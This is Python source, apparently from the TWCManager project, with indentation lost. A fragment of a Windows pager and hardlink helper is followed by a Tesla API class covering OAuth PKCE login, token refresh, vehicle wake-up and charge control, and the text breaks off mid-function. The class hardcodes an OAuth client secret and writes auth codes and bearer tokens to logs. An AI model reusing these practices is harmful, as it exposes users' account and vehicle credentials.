def get_windows_hardlink(file_path):
if os.path.isdir(file_path):
return None
cmd = ['cmd', '/c', 'fsutil', 'hardlink', 'list', file_path]
try:
Trace(' '.join(cmd))
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except:
return None
lines = [s.strip() for s in out.split('\n')]
if len(lines) >= 2 and len(lines[1]) > 0:
hardlink = file_path[0:2] + lines[0]
Trace("Hard link found: %s -> %s", file_path, hardlink)
return hardlink
else:
return None
child_process = None
def RunPager(cmd):
if isUnix():
pager.RunPager(cmd.manifest.globalConfig)
else:
RunWindowsPager(cmd)
def RunWindowsPager(cmd):
executable = pager._SelectPager(cmd.manifest.globalConfig)
redirect_all(executable)
pager.active = True
def NoPager(cmd):
if not isUnix():
RunWindowsShell(cmd)
def RunWindowsShell(cmd):
executable = _SelectCatenate(cmd.manifest.globalConfig)
redirect_all(executable)
def redirect_all(executable):
old_sysin = sys.stdin
old_sysout = sys.stdout
old_syserr = sys.stderr
Trace("redirecting to %s" % executable)
p = subprocess.Popen([executable], stdin=subprocess.PIPE, stdout=old_sysout, stderr=old_syserr)
sys.stdout = p.stdin
sys.stderr = p.stdin
old_sysout.close()
global child_process
child_process = p
def _SelectCatenate(globalConfig):
try:
return os.environ['GIT_CATENATE']
except KeyError:
pass
pager = globalConfig.GetString('core.catenate')
if pager:
return pager
try:
return os.environ['CATENATE']
except KeyError:
pass
return 'cat'
def WaitForProcess():
if not isUnix():
global child_process
if child_process:
child_process.stdin.close()
child_process.wait()
def prepare_editor_args(editor):
if isUnix():
args = [editor + ' "$@"', 'sh']
shell = True
else:
editor = re.sub('["\']', '', editor)
args = editor.rsplit()
shell = False
return (args, shell)
def os_chmod(dest, mode):
if isUnix():
os.chmod(dest, mode)
|
TeslaAPI.py
|
import base64
import hashlib
import json
import logging
import os
import re
import requests
from threading import Thread
import time
from urllib.parse import parse_qs
logger = logging.getLogger("\U0001F697 TeslaAPI")
class TeslaAPI:
__apiChallenge = None
__apiVerifier = None
__apiState = None
__authURL = "https://auth.tesla.com/oauth2/v3/token"
__callbackURL = "https://auth.tesla.com/void/callback"
carApiLastErrorTime = 0
carApiBearerToken = ""
carApiRefreshToken = ""
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiLastChargeLimitApplyTime = 0
clientID = "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384"
clientSecret = "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3"
lastChargeLimitApplied = 0
lastChargeCheck = 0
chargeUpdateInterval = 1800
carApiVehicles = []
config = None
master = None
__email = None
errorCount = 0
maxLoginRetries = 10
minChargeLevel = -1
params = None
__password = None
refreshURL = "https://auth.tesla.com/oauth2/v3/token"
__resp = None
session = None
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = [
"upstream internal error",
"operation_timedout",
"vehicle unavailable",
]
def __init__(self, master):
self.master = master
try:
self.config = master.config
self.minChargeLevel = self.config["config"].get("minChargeLevel", -1)
self.chargeUpdateInterval = self.config["config"].get(
"cloudUpdateInterval", 1800
)
except KeyError:
pass
self.generateChallenge()
def addVehicle(self, json):
self.carApiVehicles.append(CarApiVehicle(json, self, self.config))
return True
def apiDebugInterface(self, command, vehicleID, parameters):
# Provides an interface from the Web UI to allow commands to be run interactively
# Map vehicle ID back to vehicle object
vehicle = self.getVehicleByID(int(vehicleID))
# Get parameters
params = {}
try:
params = json.loads(parameters)
except json.decoder.JSONDecodeError:
pass
# Execute specified command
if command == "setChargeRate":
charge_rate = params.get("charge_rate", 0)
self.setChargeRate(charge_rate, vehicle)
return True
elif command == "wakeVehicle":
self.wakeVehicle(vehicle)
return True
# If we make it here, we did not execute a command
return False
def apiRefresh(self):
# Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": "ownerapi",
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
"scope": "openid email offline_access",
}
req = None
now = time.time()
try:
req = requests.post(self.refreshURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.log(
logging.INFO2, "Request Exception parsing API Token Refresh Response"
)
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
logger.log(
logging.INFO2, "JSON Decode Error parsing API Token Refresh Response"
)
pass
try:
logger.log(logging.INFO4, "Car API auth response" + str(apiResponseDict))
self.setCarApiBearerToken(apiResponseDict["access_token"])
self.setCarApiRefreshToken(apiResponseDict["refresh_token"])
self.setCarApiTokenExpireTime(now + apiResponseDict["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
except KeyError:
logger.log(
logging.INFO2,
"TeslaAPI",
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
except UnboundLocalError:
pass
def car_api_available(
self, email=None, password=None, charge=None, applyLimit=None
):
now = time.time()
needSleep = False
apiResponseDict = {}
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
logger.log(
logging.INFO6,
"Car API disabled for "
+ str(self.getCarApiRetryRemaining())
+ " more seconds due to recent error.",
)
return False
else:
logger.log(
logging.INFO8,
"Entering car_api_available - next step is to query Tesla API",
)
            # Authenticate to Tesla API
if not self.master.tokenSyncEnabled() and (
self.getCarApiBearerToken() == ""
or self.getCarApiTokenExpireTime() - now < 60 * 60
):
if self.getCarApiRefreshToken() != "":
headers = {
"accept": "application/json",
"Content-Type": "application/json",
}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
logger.log(logging.INFO8, "Attempting token refresh")
self.apiRefresh()
elif email is not None and password is not None:
logger.log(logging.INFO8, "Attempting password auth")
ret = self.apiLogin(email, password)
# If any string is returned, we redirect to it. This helps with MFA login flow
if (
str(ret) != "True"
and str(ret) != "False"
and str(ret) != ""
and str(ret) != "None"
):
return ret
if self.getCarApiBearerToken() != "":
if self.getVehicleCount() < 1:
url = "https://owner-api.teslamotors.com/api/1/vehicles"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd vehicles " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.info("Failed to make API call " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
except json.decoder.JSONDecodeError:
logger.info("Could not parse JSON result from " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
try:
logger.debug("Car API vehicle list" + str(apiResponseDict) + "\n")
for i in range(0, apiResponseDict["count"]):
self.addVehicle(apiResponseDict["response"][i])
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.log(
logging.INFO2,
"ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
self.updateCarApiLastErrorTime()
return False
if self.getVehicleCount() > 0 and (charge or applyLimit):
# Wake cars if needed
for vehicle in self.getCarApiVehicles():
if charge is True and vehicle.stopAskingToStartCharging:
# Vehicle is in a state (complete or charging) already
# which doesn't make sense for us to keep requesting it
# to start charging, so we will stop.
logger.log(
logging.DEBUG2,
"Don't repeatedly request API to charge "
+ vehicle.name
+ ", because vehicle.stopAskingToStartCharging "
+ " == True - it has already been requested.",
)
continue
if applyLimit is True and vehicle.stopTryingToApplyLimit:
logger.log(
logging.DEBUG2,
"Don't wake "
+ vehicle.name
+ " to set the charge limit - it has already been set",
)
continue
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
logger.log(
logging.DEBUG2,
"Don't send commands to "
+ vehicle.name
+ " because it returned an error in the last "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
continue
if vehicle.ready():
continue
if now - vehicle.lastAPIAccessTime <= vehicle.delayNextWakeAttempt:
logger.debug(
"car_api_available returning False because we are still delaying "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds after the last failed wake attempt."
)
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
apiResponseDict = self.wakeVehicle(vehicle)
state = "error"
logger.debug("Car API wake car response" + str(apiResponseDict))
try:
state = apiResponseDict["response"]["state"]
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = "error"
if state == "online":
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastAPIAccessTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if vehicle.firstWakeAttemptTime == 0:
vehicle.firstWakeAttemptTime = now
if state == "asleep" or state == "waking":
self.resetCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime <= 10 * 60:
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30
elif now - vehicle.firstWakeAttemptTime <= 70 * 60:
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5 * 60
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15 * 60
elif state == "offline":
self.resetCarApiLastErrorTime()
# In any case it can make sense to wait 5 seconds here.
                        # I had an issue where the next command was sent too
                        # fast, and only a reboot of the Raspberry Pi made it
                        # possible to reconnect to the API (even the Tesla app
                        # couldn't connect anymore).
time.sleep(5)
if now - vehicle.firstWakeAttemptTime <= 31 * 60:
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
self.updateCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime >= 60 * 60:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15 * 60
if state == "error":
logger.info(
"Car API wake car failed with unknown response. "
+ "Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
else:
logger.info(
"Car API wake car failed. State remains: '"
+ state
+ "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
if (
vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60 * 60
):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
logger.info(
"ERROR: We have failed to wake a car from '"
+ state
+ "' state for %.1f hours.\n"
"Please file an issue at https://github.com/ngardiner/TWCManager/. "
"Also include this: %s"
% (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict),
)
)
if (
now - self.getCarApiLastErrorTime() < (self.getCarApiErrorRetryMins() * 60)
or self.getCarApiBearerToken() == ""
):
logger.log(
logging.INFO8,
"car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - self.getCarApiLastErrorTime())
+ " or empty carApiBearerToken '"
+ self.getCarApiBearerToken()
+ "'",
)
return False
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
logger.log(logging.INFO8, "car_api_available returning True")
if needSleep:
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5)
return True
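# The two methods below appear to implement the PKCE (Proof Key for Code
# Exchange) half of Tesla's OAuth login flow: generateChallenge() creates a
# random code verifier, derives the code challenge as the base64url-encoded
# SHA-256 hash of that verifier (padding stripped) plus a random state value,
# and saveApiToken() later presents the stored verifier when exchanging the
# authorization code for bearer/refresh tokens. This is an interpretation of
# the code below; the exact server-side contract is Tesla's.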
def generateChallenge(self):
self.__apiVerifier = base64.urlsafe_b64encode(os.urandom(86)).rstrip(b"=")
self.__apiChallenge = base64.urlsafe_b64encode(
hashlib.sha256(self.__apiVerifier).digest()
).rstrip(b"=")
self.__apiState = (
base64.urlsafe_b64encode(os.urandom(16)).rstrip(b"=").decode("utf-8")
)
def getApiChallenge(self):
return (
self.__apiChallenge.decode("UTF-8"),
self.__apiState,
self.__apiVerifier,
)
def is_location_home(self, lat, lon):
if self.master.getHomeLatLon()[0] == 10000:
logger.info(
"Home location for vehicles has never been set. "
+ "We'll assume home is where we found the first vehicle currently parked. "
+ "Home set to lat="
+ str(lat)
+ ", lon="
+ str(lon)
)
self.master.setHomeLat(lat)
self.master.setHomeLon(lon)
self.master.queue_background_task({"cmd": "saveSettings"})
self.master.queue_background_task({"cmd": "sunrise"})
return True
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if the vehicle is within 0.0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
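# Worked example (coordinates assumed for illustration): with home at
# (37.4919, -121.9469) and the car reporting (37.5100, -121.9300), the
# deltas are 0.0181 and 0.0169 degrees; 0.0181 * 364488.888 is roughly
# 6600 feet, well inside the ~10560-foot (2-mile) radius, so the car is
# treated as being at home.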
if (
abs(self.master.getHomeLatLon()[0] - lat) > 0.0289
or abs(self.master.getHomeLatLon()[1] - lon) > 0.0289
):
return False
return True
def car_api_charge(self, charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
now = time.time()
apiResponseDict = {}
if not charge:
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in self.getCarApiVehicles():
vehicle.stopAskingToStartCharging = False
if now - self.getLastStartOrStopChargeTime() < 60:
# Don't start or stop more often than once a minute
logger.log(
logging.DEBUG2,
"car_api_charge return because not long enough since last carApiLastStartOrStopChargeTime",
)
return "error"
if self.car_api_available(charge=charge) is False:
logger.log(
logging.INFO8,
"car_api_charge return because car_api_available() == False",
)
return "error"
startOrStop = "start" if charge else "stop"
result = "success"
logger.log(logging.INFO8, "startOrStop is set to " + str(startOrStop))
for vehicle in self.getCarApiVehicles():
if charge and vehicle.stopAskingToStartCharging:
logger.log(
logging.INFO8,
"Don't charge "
+ vehicle.name
+ " because vehicle.stopAskingToStartCharging == True",
)
continue
if not vehicle.ready():
continue
if (
vehicle.update_charge()
and vehicle.batteryLevel < self.minChargeLevel
and not charge
):
# If the vehicle's charge state is lower than the configured minimum,
# don't stop it from charging, even if we'd otherwise not charge.
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
self.updateLastStartOrStopChargeTime()
if (
self.config["config"]["onlyChargeMultiCarsAtHome"]
and self.getVehicleCount() > 1
):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if vehicle.update_location() is False:
result = "error"
continue
if not vehicle.atHome:
# Vehicle is not at home, so don't change its charge state.
logger.info(
vehicle.name
+ " is not at home. Do not "
+ startOrStop
+ " charge."
)
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
if charge:
self.applyChargeLimit(self.lastChargeLimitApplied, checkArrival=True)
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/charge_" + startOrStop
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers)
logger.log(
logging.INFO8,
"Car API cmd charge_" + startOrStop + " " + str(req),
)
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(
logging.INFO4,
vehicle.name
+ ": "
+ startOrStop
+ " charge response"
+ str(apiResponseDict),
)
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if apiResponseDict["response"] is None:
# This generally indicates an error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = "error"
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
self.updateCarApiLastErrorTime(vehicle)
else:
if apiResponseDict["response"]["result"] == True:
self.resetCarApiLastErrorTime(vehicle)
elif charge:
reason = apiResponseDict["response"]["reason"]
if reason == "complete" or reason == "charging":
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
logger.info(
vehicle.name
+ " is done charging or already trying to charge. Stop asking to start charging."
)
vehicle.stopAskingToStartCharging = True
self.resetCarApiLastErrorTime(vehicle)
elif reason == "could_not_wake_buses":
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
else:
# Stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
reason = apiResponseDict["response"]["reason"]
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Failed to "
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
)
self.updateCarApiLastErrorTime(vehicle)
break
if self.getLastStartOrStopChargeTime() == now:
logger.info("Car API " + startOrStop + " charge result: " + result)
return result
def applyChargeLimit(self, limit, checkArrival=False, checkDeparture=False):
if limit != -1 and (limit < 50 or limit > 100):
logger.log(logging.INFO8, "applyChargeLimit skipped")
return "error"
if not self.car_api_available():
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
now = time.time()
if (
not checkArrival
and not checkDeparture
and now - self.carApiLastChargeLimitApplyTime < 60
):
# Don't change limits more often than once a minute
logger.log(
logging.DEBUG2,
"applyChargeLimit return because under 60 sec since last carApiLastChargeLimitApplyTime",
)
return "error"
# We need to try to apply limits if:
# - We think the car is at home and the limit has changed
# - We think the car is at home and we've been asked to check for departures
# - We think the car is at home and we notice it gone
# - We think the car is away from home and we've been asked to check for arrivals
#
# We do NOT opportunistically check for arrivals, because that would be a
# continuous API poll.
needToWake = False
for vehicle in self.carApiVehicles:
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
# Don't wake cars to tell them about reduced limits;
# only wake if they might be able to charge further now
if wasAtHome and (limit > (lastApplied if lastApplied != -1 else outside)):
needToWake = True
vehicle.stopAskingToStartCharging = False
if (
wasAtHome
and (
limit != lastApplied
or checkDeparture
or (vehicle.update_location(cacheTime=3600) and not vehicle.atHome)
)
) or (not wasAtHome and checkArrival):
vehicle.stopTryingToApplyLimit = False
if needToWake and self.car_api_available(applyLimit=True) is False:
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
if self.lastChargeLimitApplied != limit:
if limit != -1:
logger.log(
logging.INFO2,
"Attempting to apply limit of "
+ str(limit)
+ "% to all vehicles at home",
)
else:
logger.log(
logging.INFO2,
"Attempting to restore charge limits for all vehicles at home",
)
self.lastChargeLimitApplied = limit
self.carApiLastChargeLimitApplyTime = now
needSleep = False
for vehicle in self.carApiVehicles:
if vehicle.stopTryingToApplyLimit or not vehicle.ready():
continue
located = vehicle.update_location()
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
forgetVehicle = False
if not vehicle.update_charge():
# We failed to read the "normal" limit; don't risk changing it.
continue
if not wasAtHome and located and vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has arrived")
outside = vehicle.chargeLimit
elif wasAtHome and located and not vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has departed")
forgetVehicle = True
if limit == -1 or (located and not vehicle.atHome):
# We're removing any applied limit, provided it hasn't been manually changed
#
# If lastApplied == -1, the manual-change path is always selected.
if wasAtHome and vehicle.chargeLimit == lastApplied:
if vehicle.apply_charge_limit(outside):
logger.log(
logging.INFO2,
"Restoring "
+ vehicle.name
+ " to charge limit "
+ str(outside)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
# If the charge limit has been manually changed, user action overrides the
# saved charge limit. Leave it alone.
vehicle.stopTryingToApplyLimit = True
outside = vehicle.chargeLimit
if vehicle.stopTryingToApplyLimit:
if forgetVehicle:
self.master.removeNormalChargeLimit(vehicle.ID)
else:
self.master.saveNormalChargeLimit(vehicle.ID, outside, -1)
else:
if vehicle.chargeLimit != limit:
if vehicle.apply_charge_limit(limit):
logger.log(
logging.INFO2,
"Set "
+ vehicle.name
+ " to charge limit of "
+ str(limit)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
vehicle.stopTryingToApplyLimit = True
if vehicle.stopTryingToApplyLimit:
self.master.saveNormalChargeLimit(vehicle.ID, outside, limit)
if vehicle.atHome and vehicle.stopTryingToApplyLimit:
needSleep = True
if needSleep:
# If you start charging too quickly after setting the charge limit,
# the vehicle sometimes refuses the start command because it's
# "fully charged" under the old limit, but then continues to say
# charging was stopped once the new limit is in place.
time.sleep(5)
if checkArrival:
self.updateChargeAtHome()
def getCarApiBearerToken(self):
return self.carApiBearerToken
def getCarApiErrorRetryMins(self, vehicle=None):
errorCount = self.errorCount
if vehicle:
errorCount = max(vehicle.errorCount, errorCount)
errorCount = max(errorCount - 1, 0)
return min(errorCount, 10)
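# Illustration of the backoff above: the first error produces a 0-minute
# backoff (max(1 - 1, 0) == 0), the second error 1 minute, the third
# 2 minutes, and so on, capped at 10 minutes from the eleventh
# consecutive error onward.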
def getCarApiLastErrorTime(self):
return self.carApiLastErrorTime
def getCarApiRefreshToken(self):
return self.carApiRefreshToken
def getCarApiRetryRemaining(self, vehicle=None):
# Calculate the amount of time remaining until the API can be queried
# again. This is the api backoff time minus the difference between now
# and the last error time.
# The optional vehicle parameter allows taking the last error time of an
# individual vehicle into account, rather than only the API-wide error time.
lastError = self.getCarApiLastErrorTime()
if vehicle:
lastError = max(vehicle.lastErrorTime, lastError)
if lastError == 0:
return 0
else:
backoff = self.getCarApiErrorRetryMins(vehicle) * 60
lasterrortime = time.time() - lastError
if lasterrortime >= backoff:
return 0
else:
logger.log(
logging.DEBUG2,
"Backoff is "
+ str(backoff)
+ ", lasterror delta is "
+ str(lasterrortime)
+ ", last error was "
+ str(lastError),
)
return int(backoff - lasterrortime)
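# Illustration (numbers assumed): with an accumulated backoff of 2 minutes
# (120 s) and a last error 45 s ago, the method above returns
# int(120 - 45) == 75 seconds of wait remaining; once 120 s have elapsed
# it returns 0.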
def getCarApiTokenExpireTime(self):
return self.carApiTokenExpireTime
def getLastStartOrStopChargeTime(self):
return int(self.carApiLastStartOrStopChargeTime)
def getVehicleByID(self, vehicleID):
# Returns the vehicle object identified by the given ID
for vehicle in self.getCarApiVehicles():
if vehicle.ID == vehicleID:
return vehicle
return False
def getVehicleCount(self):
# Returns the number of currently tracked vehicles
return int(len(self.carApiVehicles))
def getCarApiVehicles(self):
return self.carApiVehicles
def resetCarApiLastErrorTime(self, vehicle=None):
self.carApiLastErrorTime = 0
if vehicle:
vehicle.lastErrorTime = 0
vehicle.errorCount = 0
self.errorCount = 0
return True
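# saveApiToken() below expects the pasted callback URL to contain
# 'code=<auth code>&state=<state>' query parameters (see the regex it uses);
# as written it will raise an AttributeError if the URL does not match that
# pattern.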
def saveApiToken(self, url):
# Extract code from url
if isinstance(url, bytes):
url = url.decode("UTF-8")
code = re.search(r"code=(.+)&state=(.+)", url)
logger.log(logging.INFO2, "Code: " + code.group(1))
logger.log(logging.INFO2, "State: " + code.group(2))
# Exchange auth code for bearer token
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": "ownerapi",
"grant_type": "authorization_code",
"code": str(code.group(1)),
"code_verifier": self.__apiVerifier.decode("UTF-8"),
"redirect_uri": self.__callbackURL,
}
req = None
now = time.time()
try:
req = requests.post(self.__authURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.error("Request Exception parsing API Token Exchange Response")
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
